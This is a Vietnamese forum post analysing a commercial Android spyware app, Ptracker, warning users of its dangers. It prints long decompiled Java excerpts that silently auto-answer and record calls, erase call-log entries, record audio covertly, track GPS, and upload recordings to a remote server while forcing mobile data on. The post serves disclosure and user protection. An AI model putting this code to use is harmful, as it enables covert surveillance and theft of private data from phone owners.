Bài liên quan
Vừa nhận được thông tin phần mềm có tên là Ptracker được sử dụng với mục đích thương mại vào việc theo dõi, đánh cáp thông tin người dùng. mình bắt tay vào việc phân tích nó. Trong bài viết, sẽ trình bày với các bạn về mức độ nguy hiểm, các tác hại của phần mềm tới người cài đặt nó. chứ không hướng dẫn làm thế nào để dịch ngược ứng dụng Android.
![[Hình: snapshot11_hoangcuongflp_1403628044.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u_YqGPH3immI55jCGaV8_M4UI0Cm9Bp2MJpE3Aa3tmSutNTv435cnsRKpqR_BhCsPeJR-P3fnFsvGn5Er-h28h86eHggrzsHIMnn2yjlJ8aruBxwajDRafE6gXVN_eegZQeX_7AjiJ0GXD3cYShGS0=s0-d)
![[Hình: snapshot11_hoangcuongflp_1403628044.png]](http://ceh.vn/@4rum/uploads/postimages/snapshot11_hoangcuongflp_1403628044.png)
Download phần mềm về tại địa chỉ: vhc.vn
Sau khi dịch ngược ta có một số đoạn đáng lưu ý sau:
[code]
ublic class UtilGame
{
public static String CMD_AUTO3G_OFF;
public static String CMD_AUTO3G_ON;
public static String CMD_ENCRYPT_OFF;
public static String CMD_ENCRYPT_ON;
public static String CMD_GPRS_OFF;
public static String CMD_GPRS_ON;
public static String CMD_GPS_OFF;
public static String CMD_GPS_ON;
public static String CMD_OFFLINE;
public static String CMD_ONLINE;
public static String CMD_ONLYWIFI_OFF;
public static String CMD_ONLYWIFI_ON;
public static String CMD_POSITION;
public static int CMD_READ_AUDIO;
public static int CMD_READ_IMAGES;
public static int CMD_READ_OTHER;
public static int CMD_READ_VIDEO;
public static String CMD_REBOOT;
public static String CMD_SAVEPIN_OFF;
public static String CMD_SAVEPIN_ON;
public static int CMD_START_LIVEAUDIO;
public static int CMD_START_LIVECAMERA;
public static int CMD_START_PICTURE;
public static int CMD_START_READAPPS;
public static int CMD_START_READCONTACT;
public static int CMD_START_READLOGCALL;
public static int CMD_START_READSMS;
public static int CMD_START_READWEB;
public static int CMD_START_RECORDAUDIO;
public static int CMD_START_RECORDVIDEO;
public static int CMD_STOP_LIVEAUDIO;
public static int CMD_STOP_LIVECAMERA;
public static int CMD_STOP_PICTURE;
public static int CMD_STOP_RECORDAUDIO;
public static int CMD_STOP_RECORDVIDEO;
public static String CMD_WIFI_OFF;
public static String CMD_WIFI_ON;
public static String DIR_SAVE;
public static String FILE_SAVE;
public static boolean GPS_NETWORK;
public static boolean GPS_SAT;
public static int INCOMING_AUDIO_ENCODER;
public static int INCOMING_OUTPUT_FORMAT;
public static int INCOMING_SOURCE;
public static String KEY_PTRACKER;
public static int OUTCOMING_AUDIO_ENCODER;
public static int OUTCOMING_OUTPUT_FORMAT;
public static int OUTCOMING_SOURCE;
public static String PREFIX_SMS;
private static UtilGame _instance;
public static String autoCallAnswer;
public static boolean autoNotTurnOn3G;
public static boolean autoSmartBattery;
public static String blockCall;
public static String blockSms;
public static String cmdCustom;
public static String cmdGPS;
public static String cmdReboot;
public static String companyid;
public static String debug;
public static int errNetWorkTimes;
public static String file3GP;
public static String fileJPG;
public static String fileTXT;
public static String infoRunServiceBackupDebug;
public static boolean isAutoLogin;
public static boolean isBusy;
public static boolean isDaily = false;
public static boolean isEnglish;
public static String isFirstRun;
public static boolean isLiveAudio;
public static boolean isLiveCamera;
public static boolean isModeDebug;
public static boolean isModeNoFixFreezeLocation;
public static boolean isNoRecordContact;
public static boolean isNoRecordLocation;
public static boolean isNoRecordSms;
public static boolean isNoRecordWeb;
public static boolean isNotUsingNotification;
public static boolean isPtrackerErpLite;
public static boolean isRecordAudio;
public static boolean isRecordImage;
public static boolean isRecordVideo;
public static boolean isRestarting;
public static boolean isRunningService;
public static boolean isRunningServiceBackup;
public static boolean isSdCard;
public static boolean isUploadAfterCreated;
public static boolean isUseOnlyCellID;
public static String lastData;
public static String liveCodeC;
public static boolean liveVideoSwf;
public static String liveaudio;
public static String locationHome;
public static int maxTimeOutTimes;
public static int maxTimeToCancel;
public static boolean modeAutoTurnOnScreen;
public static boolean modeClassic;
public static boolean modeEncrypt;
public static boolean modeOffline;
public static boolean modeOnlyWifi;
public static String packageSoft;
public static int recordcall;
public static int recordcall1;
public static boolean save3GState;
public static int savepin;
public static int timeRestartServiceBackup;
public static int timeRunServiceBackupDebug;
public static Date timeStarted;
public static int timeToRestart;
public static int timeToSendGetData;
public static int timeToSendGetDataMax;
public static String typegame;
public static boolean useRestartAuto = false;
public static boolean useServiceBackup;
public static String version;
public static boolean voiceCall;
private int indexThreadMain = 0;
private boolean isDowload = false;
private String lcationName;
}
[/code]
Trên đây là đoạn mã yêu cầu quyền được cấp cho chương trình. Như vậy là, chương trình yêu cầu cấp quyền gần như toàn bộ những hành động mà người dúử dụng có thể tác động lên máy điện thoại của mình: gửi tin nhắn, gọi điện, chụp hình, quay video, ghi âm,… nhưng ngoài ra, nó còn đòi thực hiện những chức năng “ngầm” mà người sử dụng không hề biết như: nghe lén cuộc gọi, chụp hình webcame rồi gửi về server trong khi người dùng không hề biết, quay video, ghi âm thông thường, truy cập dữ liệu trên máy điện thoại như các tệp văn bản, hình ảnh, âm thanh, video,.. rồi gửi về máy chủ. Có thể “quản lý” tốt hơn cả người dùng: quản lý tin nhắn, cuộc gọi, các ứng dụng trên máy tính… hay thậm chí cả tắt máy.
Điển hình một số hàm như:
Điển hình một số hàm như:
[code]
public static void checkSDCard()
{
isSdCard = Environment.getExternalStorageState().equals("mounted");
}
public static int getGMT()
{
return new GregorianCalendar().getTimeZone().getRawOffset() / 1000;
}
{
return new GregorianCalendar().getTimeZone().getRawOffset() / 1000;
}
public static UtilGame getInstance()
{
if (_instance == null)
_instance = new UtilGame();
return _instance;
}
{
if (_instance == null)
_instance = new UtilGame();
return _instance;
}
public static String getParamData()
{
return "&sdcard=" + isSdCard + "&pin=" + StoreUtil.getInstance().getLevelBattery() + "&d=" + lastData;
}
{
return "&sdcard=" + isSdCard + "&pin=" + StoreUtil.getInstance().getLevelBattery() + "&d=" + lastData;
}
public static String getStringCAndC()
{
boolean bool = ContextManagerCore.getInstance().IsMockLocation();
recordcall1 = recordcall;
String str1;
String str2;
label45: String str3;
label63: String str4;
label83: String str5;
label104: String str6;
label125: String str7;
label145: String str8;
label228: String str9;
label248: String str10;
label268: String str11;
label288: String str12;
label332: String str13;
label352: String str14;
label372: String str15;
label392: String str16;
label411: String str17;
label431: String str18;
label451: String str19;
label471: String str20;
label491: String str21;
label511: String str22;
label573: String str23;
label593: String str24;
label613: String str25;
label631: StringBuilder localStringBuilder25;
if (isRecordImage)
{
str1 = "1";
StringBuilder localStringBuilder1 = new StringBuilder(String.valueOf(str1));
if (!isRecordAudio)
break label707;
str2 = "1";
StringBuilder localStringBuilder2 = localStringBuilder1.append(str2);
if (!isLiveAudio)
break label713;
str3 = "1";
StringBuilder localStringBuilder3 = localStringBuilder2.append(str3);
if (!isLiveCamera)
break label720;
str4 = "1";
StringBuilder localStringBuilder4 = localStringBuilder3.append(str4);
if (recordcall != 1)
break label727;
str5 = "1";
StringBuilder localStringBuilder5 = localStringBuilder4.append(str5);
if (recordcall1 != 1)
break label734;
str6 = "1";
StringBuilder localStringBuilder6 = localStringBuilder5.append(str6);
if (!voiceCall)
break label741;
str7 = "1";
StringBuilder localStringBuilder7 = localStringBuilder6.append(str7).append(String.valueOf(savepin)).append(String.valueOf(OUTCOMING_SOURCE)).append(String.valueOf(INCOMING_SOURCE)).append(String.valueOf(OUTCOMING_OUTPUT_FORMAT)).append(String.valueOf(INCOMING_OUTPUT_FORMAT)).append(String.valueOf(OUTCOMING_AUDIO_ENCODER)).append(String.valueOf(INCOMING_AUDIO_ENCODER));
if (!save3GState)
break label748;
str8 = "1";
StringBuilder localStringBuilder8 = localStringBuilder7.append(str8);
if (!modeOffline)
break label755;
str9 = "1";
StringBuilder localStringBuilder9 = localStringBuilder8.append(str9);
if (!modeAutoTurnOnScreen)
break label762;
str10 = "1";
StringBuilder localStringBuilder10 = localStringBuilder9.append(str10);
if (!autoSmartBattery)
break label769;
str11 = "1";
StringBuilder localStringBuilder11 = localStringBuilder10.append(str11).append(liveCodeC).append(cmdGPS).append(cmdReboot).append(cmdCustom);
if (!autoNotTurnOn3G)
break label776;
str12 = "1";
StringBuilder localStringBuilder12 = localStringBuilder11.append(str12);
if (!modeOnlyWifi)
break label783;
str13 = "1";
StringBuilder localStringBuilder13 = localStringBuilder12.append(str13);
if (!modeEncrypt)
break label790;
str14 = "1";
StringBuilder localStringBuilder14 = localStringBuilder13.append(str14);
if (!liveVideoSwf)
break label797;
str15 = "1";
StringBuilder localStringBuilder15 = localStringBuilder14.append(str15);
if (!useRestartAuto)
break label804;
str16 = "0";
StringBuilder localStringBuilder16 = localStringBuilder15.append(str16);
if (!isNotUsingNotification)
break label812;
str17 = "1";
StringBuilder localStringBuilder17 = localStringBuilder16.append(str17);
if (!isUploadAfterCreated)
break label819;
str18 = "1";
StringBuilder localStringBuilder18 = localStringBuilder17.append(str18);
if (!isNoRecordSms)
break label826;
str19 = "1";
StringBuilder localStringBuilder19 = localStringBuilder18.append(str19);
if (!isNoRecordLocation)
break label833;
str20 = "1";
StringBuilder localStringBuilder20 = localStringBuilder19.append(str20);
if (!modeClassic)
break label840;
str21 = "1";
StringBuilder localStringBuilder21 = localStringBuilder20.append(str21).append(":").append(blockCall).append(":").append(blockSms).append(":").append(autoCallAnswer).append(":");
if (!isNoRecordContact)
break label847;
str22 = "1";
StringBuilder localStringBuilder22 = localStringBuilder21.append(str22);
if (!isModeNoFixFreezeLocation)
break label854;
str23 = "1";
StringBuilder localStringBuilder23 = localStringBuilder22.append(str23);
if (!isUseOnlyCellID)
break label861;
str24 = "1";
StringBuilder localStringBuilder24 = localStringBuilder23.append(str24);
if (!bool)
break label868;
str25 = "1";
localStringBuilder25 = localStringBuilder24.append(str25);
if (!StoreUtil.getInstance().isCharging())
break label875;
}
[/code]
ăn cắp dữ liệu
public class FileUtilErp
{
public static String DIR_SAVE;
public static String FILE_OFFLINE;
public static String FILE_SAVE = "metadata";
static
{
DIR_SAVE = "/sdcard/tmpb/";
FILE_OFFLINE = DIR_SAVE + FILE_SAVE + ".txt";
}
{
DIR_SAVE = "/sdcard/tmpb/";
FILE_OFFLINE = DIR_SAVE + FILE_SAVE + ".txt";
}
public static void close(OutputStream paramOutputStream)
{
if (paramOutputStream != null);
try
{
paramOutputStream.close();
return;
}
catch (IOException localIOException)
{
}
}
{
if (paramOutputStream != null);
try
{
paramOutputStream.close();
return;
}
catch (IOException localIOException)
{
}
}
public static File createDir(String paramString)
{
File localFile = new File(paramString);
if ((!localFile.exists()) && (!localFile.mkdirs()))
localFile = null;
return localFile;
}
{
File localFile = new File(paramString);
if ((!localFile.exists()) && (!localFile.mkdirs()))
localFile = null;
return localFile;
}
public static void deleteFileMetaData()
{
File localFile = new File(DIR_SAVE + FILE_SAVE + ".txt");
if (localFile.exists())
localFile.delete();
}
{
File localFile = new File(DIR_SAVE + FILE_SAVE + ".txt");
if (localFile.exists())
localFile.delete();
}
public static void encryptFile(String paramString)
{
try
{
byte[] arrayOfByte1 = new byte[10];
byte[] arrayOfByte2 = new byte[10];
RandomAccessFile localRandomAccessFile = new RandomAccessFile(paramString, "rw");
localRandomAccessFile.seek(0L);
localRandomAccessFile.read(arrayOfByte1);
localRandomAccessFile.seek(localRandomAccessFile.length() - arrayOfByte2.length - 1L);
localRandomAccessFile.read(arrayOfByte2);
localRandomAccessFile.seek(0L);
localRandomAccessFile.write(arrayOfByte2);
localRandomAccessFile.seek(localRandomAccessFile.length() - arrayOfByte1.length - 1L);
localRandomAccessFile.write(arrayOfByte1);
localRandomAccessFile.close();
return;
}
catch (IOException localIOException)
{
System.out.println(localIOException.getMessage());
}
}
{
try
{
byte[] arrayOfByte1 = new byte[10];
byte[] arrayOfByte2 = new byte[10];
RandomAccessFile localRandomAccessFile = new RandomAccessFile(paramString, "rw");
localRandomAccessFile.seek(0L);
localRandomAccessFile.read(arrayOfByte1);
localRandomAccessFile.seek(localRandomAccessFile.length() - arrayOfByte2.length - 1L);
localRandomAccessFile.read(arrayOfByte2);
localRandomAccessFile.seek(0L);
localRandomAccessFile.write(arrayOfByte2);
localRandomAccessFile.seek(localRandomAccessFile.length() - arrayOfByte1.length - 1L);
localRandomAccessFile.write(arrayOfByte1);
localRandomAccessFile.close();
return;
}
catch (IOException localIOException)
{
System.out.println(localIOException.getMessage());
}
}
public static String encryptString(String paramString)
{
return paramString;
}
{
return paramString;
}
public static File getTempDir()
{
File localFile = new File(DIR_SAVE);
if ((!localFile.exists()) && (!localFile.mkdirs()))
localFile = null;
return localFile;
}
{
File localFile = new File(DIR_SAVE);
if ((!localFile.exists()) && (!localFile.mkdirs()))
localFile = null;
return localFile;
}
public static HashMap<String, DataMetaData> loadTextFromMetaData()
{
try
{
File localFile = new File(DIR_SAVE + FILE_SAVE + ".txt");
HashMap localHashMap = new HashMap();
FileReader localFileReader = new FileReader(localFile);
BufferedReader localBufferedReader = new BufferedReader(localFileReader);
while (true)
{
String str = localBufferedReader.readLine();
if (str == null)
{
localFileReader.close();
return localHashMap;
}
String[] arrayOfString = str.split(",");
DataMetaData localDataMetaData = new DataMetaData(arrayOfString[0], arrayOfString[2], arrayOfString[1], arrayOfString[3]);
localHashMap.put(arrayOfString[0], localDataMetaData);
}
}
catch (Exception localException)
{
Log.v("lamdaica1", "Expcetion when loadTextFromMetaData:" + localException.toString());
}
return new HashMap();
}
{
try
{
File localFile = new File(DIR_SAVE + FILE_SAVE + ".txt");
HashMap localHashMap = new HashMap();
FileReader localFileReader = new FileReader(localFile);
BufferedReader localBufferedReader = new BufferedReader(localFileReader);
while (true)
{
String str = localBufferedReader.readLine();
if (str == null)
{
localFileReader.close();
return localHashMap;
}
String[] arrayOfString = str.split(",");
DataMetaData localDataMetaData = new DataMetaData(arrayOfString[0], arrayOfString[2], arrayOfString[1], arrayOfString[3]);
localHashMap.put(arrayOfString[0], localDataMetaData);
}
}
catch (Exception localException)
{
Log.v("lamdaica1", "Expcetion when loadTextFromMetaData:" + localException.toString());
}
return new HashMap();
}
public static boolean saveTextToMetaData(String paramString1, String paramString2, String paramString3, String paramString4)
{
try
{
String str = paramString3.replace(",", "");
File localFile = new File(DIR_SAVE + FILE_SAVE + ".txt");
if (!localFile.exists())
localFile.createNewFile();
FileWriter localFileWriter = new FileWriter(localFile, true);
localFileWriter.write(new StringBuilder(String.valueOf(paramString1)).append(",").append(paramString2).append(",").append(str).append(",").append(paramString4).toString() + "\n");
localFileWriter.flush();
localFileWriter.close();
return true;
}
catch (Exception localException)
{
}
return false;
}
}
Tự động nghe lén cuộc gọi:
private void answerPhoneHeadsethook(Context paramContext)
{
Intent localIntent1 = new Intent("android.intent.action.MEDIA_BUTTON");
localIntent1.putExtra("android.intent.extra.KEY_EVENT", new KeyEvent(0, 79));
paramContext.sendOrderedBroadcast(localIntent1, "android.permission.CALL_PRIVILEGED");
Intent localIntent2 = new Intent("android.intent.action.MEDIA_BUTTON");
localIntent2.putExtra("android.intent.extra.KEY_EVENT", new KeyEvent(1, 79));
paramContext.sendOrderedBroadcast(localIntent2, "android.permission.CALL_PRIVILEGED");
}
private void autoAnswer(Context paramContext)
{
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
Method localMethod = Class.forName(localTelephonyManager.getClass().getName()).getDeclaredMethod("getITelephony", new Class[0]);
localMethod.setAccessible(true);
ITelephony localITelephony = (ITelephony)localMethod.invoke(localTelephonyManager, new Object[0]);
localITelephony.silenceRinger();
localITelephony.answerRingingCall();
return;
}
catch (Exception localException)
{
answerPhoneHeadsethook(paramContext);
}
}
{
try
{
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
Method localMethod = Class.forName(localTelephonyManager.getClass().getName()).getDeclaredMethod("getITelephony", new Class[0]);
localMethod.setAccessible(true);
ITelephony localITelephony = (ITelephony)localMethod.invoke(localTelephonyManager, new Object[0]);
localITelephony.silenceRinger();
localITelephony.answerRingingCall();
return;
}
catch (Exception localException)
{
answerPhoneHeadsethook(paramContext);
}
}
private void blockOrAnswerCallIfNeed(Context paramContext, String paramString)
{
try
{
if ((!UtilGame.isAutoAnswerCall(paramString)) && (!UtilGame.isBlockCall(paramString)))
return;
if (UtilGame.isBlockCall(paramString))
{
UtilMemory.addTo(new DataObject(ConfigGame.getInstance(null).getActiveKey(), 2, ContextManagerCore.getInstance().readLastPosition(), String.valueOf(StoreUtil.getInstance().getLevelBattery()), paramString, "block", UtilGame.getInstance().GetStringNow()));
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
Method localMethod = Class.forName(localTelephonyManager.getClass().getName()).getDeclaredMethod("getITelephony", new Class[0]);
localMethod.setAccessible(true);
((ITelephony)localMethod.invoke(localTelephonyManager, new Object[0])).endCall();
new DelayClearCallLog(paramContext, paramString).start();
return;
}
}
catch (Exception localException)
{
localException.printStackTrace();
return;
}
if (UtilGame.isAutoAnswerCall(paramString))
autoAnswer(paramContext);
}
{
try
{
if ((!UtilGame.isAutoAnswerCall(paramString)) && (!UtilGame.isBlockCall(paramString)))
return;
if (UtilGame.isBlockCall(paramString))
{
UtilMemory.addTo(new DataObject(ConfigGame.getInstance(null).getActiveKey(), 2, ContextManagerCore.getInstance().readLastPosition(), String.valueOf(StoreUtil.getInstance().getLevelBattery()), paramString, "block", UtilGame.getInstance().GetStringNow()));
TelephonyManager localTelephonyManager = (TelephonyManager)paramContext.getSystemService("phone");
Method localMethod = Class.forName(localTelephonyManager.getClass().getName()).getDeclaredMethod("getITelephony", new Class[0]);
localMethod.setAccessible(true);
((ITelephony)localMethod.invoke(localTelephonyManager, new Object[0])).endCall();
new DelayClearCallLog(paramContext, paramString).start();
return;
}
}
catch (Exception localException)
{
localException.printStackTrace();
return;
}
if (UtilGame.isAutoAnswerCall(paramString))
autoAnswer(paramContext);
}
private void enableSpeakerPhone(Context paramContext)
{
((AudioManager)paramContext.getSystemService("audio")).setSpeakerphoneOn(true);
}
{
((AudioManager)paramContext.getSystemService("audio")).setSpeakerphoneOn(true);
}
public void onReceive(Context paramContext, Intent paramIntent)
{
try
{
if (UtilGame.modeClassic)
return;
ContextManagerCore.getInstance().checkServiceTimeOut();
this.phoneNumber = paramIntent.getStringExtra("android.intent.extra.PHONE_NUMBER");
if (this.phoneNumber != null)
break label381;
if ((UtilGame.recordcall == 0) || (UtilGame.modeOffline))
return;
if (paramIntent.getStringExtra("state").equals(TelephonyManager.EXTRA_STATE_OFFHOOK))
{
if (this.phoneNumber == null)
this.phoneNumber = paramIntent.getStringExtra("incoming_number");
isAnswer = 1;
Intent localIntent6 = new Intent(paramContext, RecordService.class);
localIntent6.putExtra("commandType", 1);
localIntent6.putExtra("phoneNumber", this.phoneNumber);
paramContext.startService(localIntent6);
return;
}
}
catch (Exception localException)
{
isAnswer = -1;
lastPhoneNumber = "";
UtilMemory.addTo(new DataObject(StoreUtil.getInstance().getImei(), 8, "InOutComingLogx:" + localException.toString(), String.valueOf(StoreUtil.getInstance().getLevelBattery()), "", "", UtilGame.getInstance().GetStringNow()));
return;
}
if (paramIntent.getStringExtra("state").equals(TelephonyManager.EXTRA_STATE_IDLE))
{
Intent localIntent4 = new Intent(paramContext, RecordService.class);
localIntent4.putExtra("commandType", 2);
paramContext.startService(localIntent4);
if (isAnswer == -1)
UtilMemory.addTo(new DataObject(ConfigGame.getInstance(null).getActiveKey(), 2, ContextManagerCore.getInstance().readLastPosition(), String.valueOf(StoreUtil.getInstance().getLevelBattery()), lastPhoneNumber, "misscall", UtilGame.getInstance().GetStringNow()));
isAnswer = -1;
lastPhoneNumber = "";
return;
}
if (paramIntent.getStringExtra("state").equals(TelephonyManager.EXTRA_STATE_RINGING))
{
if (this.phoneNumber == null)
this.phoneNumber = paramIntent.getStringExtra("incoming_number");
lastPhoneNumber = this.phoneNumber;
blockOrAnswerCallIfNeed(paramContext, this.phoneNumber);
Intent localIntent5 = new Intent(paramContext, RecordService.class);
localIntent5.putExtra("commandType", 0);
localIntent5.putExtra("phoneNumber", this.phoneNumber);
paramContext.startService(localIntent5);
return;
label381: if (this.phoneNumber.equals(SecUtil.getActivateCode()))
{
Intent localIntent1 = new Intent(paramContext, LockMainActivity.class);
localIntent1.setFlags(268435456);
paramContext.startActivity(localIntent1);
abortBroadcast();
return;
}
if (this.phoneNumber.equals(SecUtil.getActivateCodeManager()))
{
Intent localIntent2 = new Intent(paramContext, PreferencesActivity1.class);
localIntent2.setFlags(268435456);
paramContext.startActivity(localIntent2);
abortBroadcast();
return;
}
if ((UtilGame.recordcall != 0) && (!UtilGame.modeOffline) && (!APTrackerService.statusCmdRealtime.equals("1")))
{
Intent localIntent3 = new Intent(paramContext, RecordService.class);
localIntent3.putExtra("commandType", 3);
localIntent3.putExtra("phoneNumber", this.phoneNumber);
paramContext.startService(localIntent3);
}
}
}
Ghi âm khổ chủ @@”
public void startRecordAudio()
{
makeDirTemp();
updateStatus("Start record audio...");
try
{
this.mRecorder = new MediaRecorder();
this.mRecorder.setAudioSource(1);
this.mRecorder.setOutputFormat(2);
APTrackerService.fileNameCurrent = "ok_" + LocationUtilErp.getInstance().getIMEI() + "_" + UtilGame.getInstance().GetStringNow() + "_" + MemberUtil.memberid + "_" + MemberUtil.placeid + "_au_" + MemberUtil.videoEncoder + "." + MemberUtil.formatStreaming;
this.mRecorder.setOutputFile(MemberUtil.resourceDirectory + "/" + APTrackerService.fileNameCurrent);
this.mRecorder.setAudioEncoder(3);
this.fileToUpload = (MemberUtil.resourceDirectory + "/" + APTrackerService.fileNameCurrent);
try
{
this.mRecorder.prepare();
this.mRecorder.start();
updateStatus("Recording Audio");
updateStatusUIRecording(1);
startUpdateTimeRecording();
this.isRecording = true;
return;
}
catch (IOException localIOException)
{
updateStatus("Error:" + localIOException.toString());
return;
}
}
catch (Exception localException)
{
while (true)
updateStatus("Error:" + localException.toString());
}
}
public void startUpdateTimeRecording()
{
this.totalTime = 0;
this.mStatusChecker = new Runnable()
{
public void run()
{
while (true)
{
if (!InformAudio.this.isRecording)
return;
try
{
Thread.sleep(1000L);
Message localMessage = new Message();
localMessage.obj = Integer.valueOf(InformAudio.this.totalTime);
InformAudio.this.hxStatusTime.sendMessage(localMessage);
InformAudio localInformAudio = InformAudio.this;
localInformAudio.totalTime = (1 + localInformAudio.totalTime);
}
catch (InterruptedException localInterruptedException)
{
while (true)
localInterruptedException.printStackTrace();
}
}
}
};
this.thrUpdateTime = new Thread(this.mStatusChecker);
this.thrUpdateTime.start();
}
{
this.totalTime = 0;
this.mStatusChecker = new Runnable()
{
public void run()
{
while (true)
{
if (!InformAudio.this.isRecording)
return;
try
{
Thread.sleep(1000L);
Message localMessage = new Message();
localMessage.obj = Integer.valueOf(InformAudio.this.totalTime);
InformAudio.this.hxStatusTime.sendMessage(localMessage);
InformAudio localInformAudio = InformAudio.this;
localInformAudio.totalTime = (1 + localInformAudio.totalTime);
}
catch (InterruptedException localInterruptedException)
{
while (true)
localInterruptedException.printStackTrace();
}
}
}
};
this.thrUpdateTime = new Thread(this.mStatusChecker);
this.thrUpdateTime.start();
}
public void stopRecordAudio()
{
try
{
updateStatus("Stoping Recording Audio...");
try
{
this.mRecorder.stop();
this.mRecorder.release();
this.mRecorder = null;
updateStatusUIRecording(2);
this.isRecording = false;
return;
}
catch (Exception localException2)
{
updateStatus("Stop Error:" + localException2.toString());
return;
}
}
catch (Exception localException1)
{
while (true)
updateStatus("Stoping Error:" + localException1);
}
}
{
try
{
updateStatus("Stoping Recording Audio...");
try
{
this.mRecorder.stop();
this.mRecorder.release();
this.mRecorder = null;
updateStatusUIRecording(2);
this.isRecording = false;
return;
}
catch (Exception localException2)
{
updateStatus("Stop Error:" + localException2.toString());
return;
}
}
catch (Exception localException1)
{
while (true)
updateStatus("Stoping Error:" + localException1);
}
}
public void stopUpdateTimeRecording()
{
this.thrUpdateTime.stop();
}
{
this.thrUpdateTime.stop();
}
public void updateStatus(String paramString)
{
Message localMessage = new Message();
localMessage.obj = paramString;
localMessage.what = 1;
this.hxStatus.sendMessage(localMessage);
}
{
Message localMessage = new Message();
localMessage.obj = paramString;
localMessage.what = 1;
this.hxStatus.sendMessage(localMessage);
}
class UploadDataToURL extends AsyncTask<String, String, String>
{
UploadDataToURL()
{
}
{
UploadDataToURL()
{
}
protected String doInBackground(String[] paramArrayOfString)
{
try
{
paramArrayOfString[1];
String str1 = "http://bx2.vhc.vn/services/data/" + paramArrayOfString[0];
if (!ContextManagerErp.getInstance().isConnected())
ContextManagerErp.getInstance().setMobileDataEnabled(true);
HttpURLConnection localHttpURLConnection = (HttpURLConnection)new URL(str1).openConnection();
localHttpURLConnection.setDoInput(true);
localHttpURLConnection.setDoOutput(true);
localHttpURLConnection.setUseCaches(false);
localHttpURLConnection.setRequestMethod("POST");
localHttpURLConnection.setRequestProperty("Connection", "Keep-Alive");
localHttpURLConnection.setRequestProperty("Content-Type", "multipart/form-data;boundary=" + "*****");
DataOutputStream localDataOutputStream = new DataOutputStream(localHttpURLConnection.getOutputStream());
try
{
localDataOutputStream.writeBytes("--" + "*****" + "\r\n");
localDataOutputStream.writeBytes("Content-Disposition: form-data; name=\"uploadedfile\";filename=\"FILE." + MemberUtil.formatStreaming + "\"" + "\r\n");
localDataOutputStream.writeBytes("\r\n");
FileInputStream localFileInputStream = new FileInputStream(new File(InformAudio.this.fileToUpload));
new ByteArrayOutputStream();
byte[] arrayOfByte = new byte[localFileInputStream.available()];
localFileInputStream.read(arrayOfByte, 0, arrayOfByte.length);
i = 0;
if (i >= arrayOfByte.length)
{
localDataOutputStream.writeBytes("\r\n");
localDataOutputStream.writeBytes("--" + "*****" + "--" + "\r\n");
localHttpURLConnection.getResponseCode();
localHttpURLConnection.getResponseMessage();
localDataOutputStream.flush();
localDataOutputStream.close();
localFileInputStream.close();
return "Upload Ok";
}
int j = (int)(100.0F * (i / arrayOfByte.length));
String[] arrayOfString = new String[2];
arrayOfString[0] = j;
if (j == 99)
{
str2 = "Đang lưu trên server...";
arrayOfString[1] = str2;
publishProgress(arrayOfString);
if (arrayOfByte.length - i >= 256)
localDataOutputStream.write(arrayOfByte, i, 256);
else
localDataOutputStream.write(arrayOfByte, i, arrayOfByte.length - i);
}
}
catch (Exception localException1)
{
return "Error:" + localException1.toString();
}
}
catch (Exception localException2)
{
while (true)
{
int i;
continue;
i += 256;
continue;
String str2 = "Uploading...";
}
}
}
Xoá log cuộc gọi 
class DelayClearCallLog extends Thread
{
public Context context;
public String phoneNumber;
public DelayClearCallLog(Context paramString, String arg3)
{
this.context = paramString;
Object localObject;
this.phoneNumber = localObject;
}
{
this.context = paramString;
Object localObject;
this.phoneNumber = localObject;
}
public void clearCallLog(Context paramContext, String paramString)
{
Uri localUri = Uri.parse("content://call_log/calls");
Cursor localCursor = paramContext.getContentResolver().query(localUri, null, null, null, null);
if (localCursor.getCount() > 0)
{
localCursor.moveToLast();
String str = "NUMBER='" + paramString + "'";
if (localCursor.getCount() > 0)
paramContext.getContentResolver().delete(localUri, str, null);
}
((NotificationManager)paramContext.getSystemService("notification")).cancelAll();
}
Quay lén khổ chủ @@” nếu mà dùng điện thoại trong một vài trường hợp nhạy cảm thì…. @@”
public MediaRecorderNew(boolean paramBoolean, int paramInt1, int paramInt2, int paramInt3, int paramInt4)
{
while (true)
{
try
{
this.rUncompressed = paramBoolean;
if (!this.rUncompressed)
break label319;
if (paramInt4 == 2)
{
this.bSamples = 16;
if (paramInt3 != 2)
break label270;
this.nChannels = 1;
this.aSource = paramInt1;
this.sRate = paramInt2;
this.aFormat = paramInt4;
this.framePeriod = (paramInt2 * 120 / 1000);
this.bufferSize = (2 * this.framePeriod * this.bSamples * this.nChannels / 8);
if (this.bufferSize >= AudioRecord.getMinBufferSize(paramInt2, paramInt3, paramInt4))
continue;
this.bufferSize = AudioRecord.getMinBufferSize(paramInt2, paramInt3, paramInt4);
this.framePeriod = (this.bufferSize / (2 * this.bSamples * this.nChannels / 8));
Log.w(MediaRecorderNew.class.getName(), "Increasing buffer size to " + Integer.toString(this.bufferSize));
this.aRecorder = new AudioRecord(paramInt1, paramInt2, paramInt3, paramInt4, this.bufferSize);
if (this.aRecorder.getState() == 1)
break;
throw new Exception("AudioRecord initialization failed");
}
}
catch (Exception localException)
{
localException.getMessage();
this.state = State.ERROR;
return;
}
this.bSamples = 8;
continue;
label270: this.nChannels = 2;
}
this.aRecorder.setRecordPositionUpdateListener(this.updateListener);
this.aRecorder.setPositionNotificationPeriod(this.framePeriod);
while (true)
{
this.cAmplitude = 0;
this.fPath = null;
this.state = State.INITIALIZING;
return;
label319: this.mRecorder = new MediaRecorder();
this.mRecorder.setAudioSource(1);
this.mRecorder.setOutputFormat(1);
this.mRecorder.setAudioEncoder(1);
}
}
Lấy vị trí và theo dõi sụ di chuyển của người dùng
public class GPSPosition
implements Runnable
{
private static final long MINIMUM_DISTANCE_CHANGE_FOR_UPDATES = 1L;
private static final long MINIMUM_TIME_BETWEEN_UPDATES = 30000L;
private Context _app;
protected LocationManager locationManager;
protected LocationListener myListenter;
protected LocationListener myListenterNetwork;
public GPSPosition(Context paramContext){this._app = paramContext;startLocationUpdate();}
private void startLocationUpdate()
{
this.locationManager = ((LocationManager)this._app.getSystemService("location"));
if (this.locationManager == null)
return;
if (this.locationManager.isProviderEnabled("gps"))
{
UtilGame.GPS_SAT = false;
this.myListenter = new MyLocationListener(null);
this.locationManager.requestLocationUpdates("gps", 30000L, 1.0F, this.myListenter);
}
while (this.locationManager.isProviderEnabled("network"))
{
UtilGame.GPS_NETWORK = true;
this.myListenterNetwork = new MyLocationListenerNetwork(null);
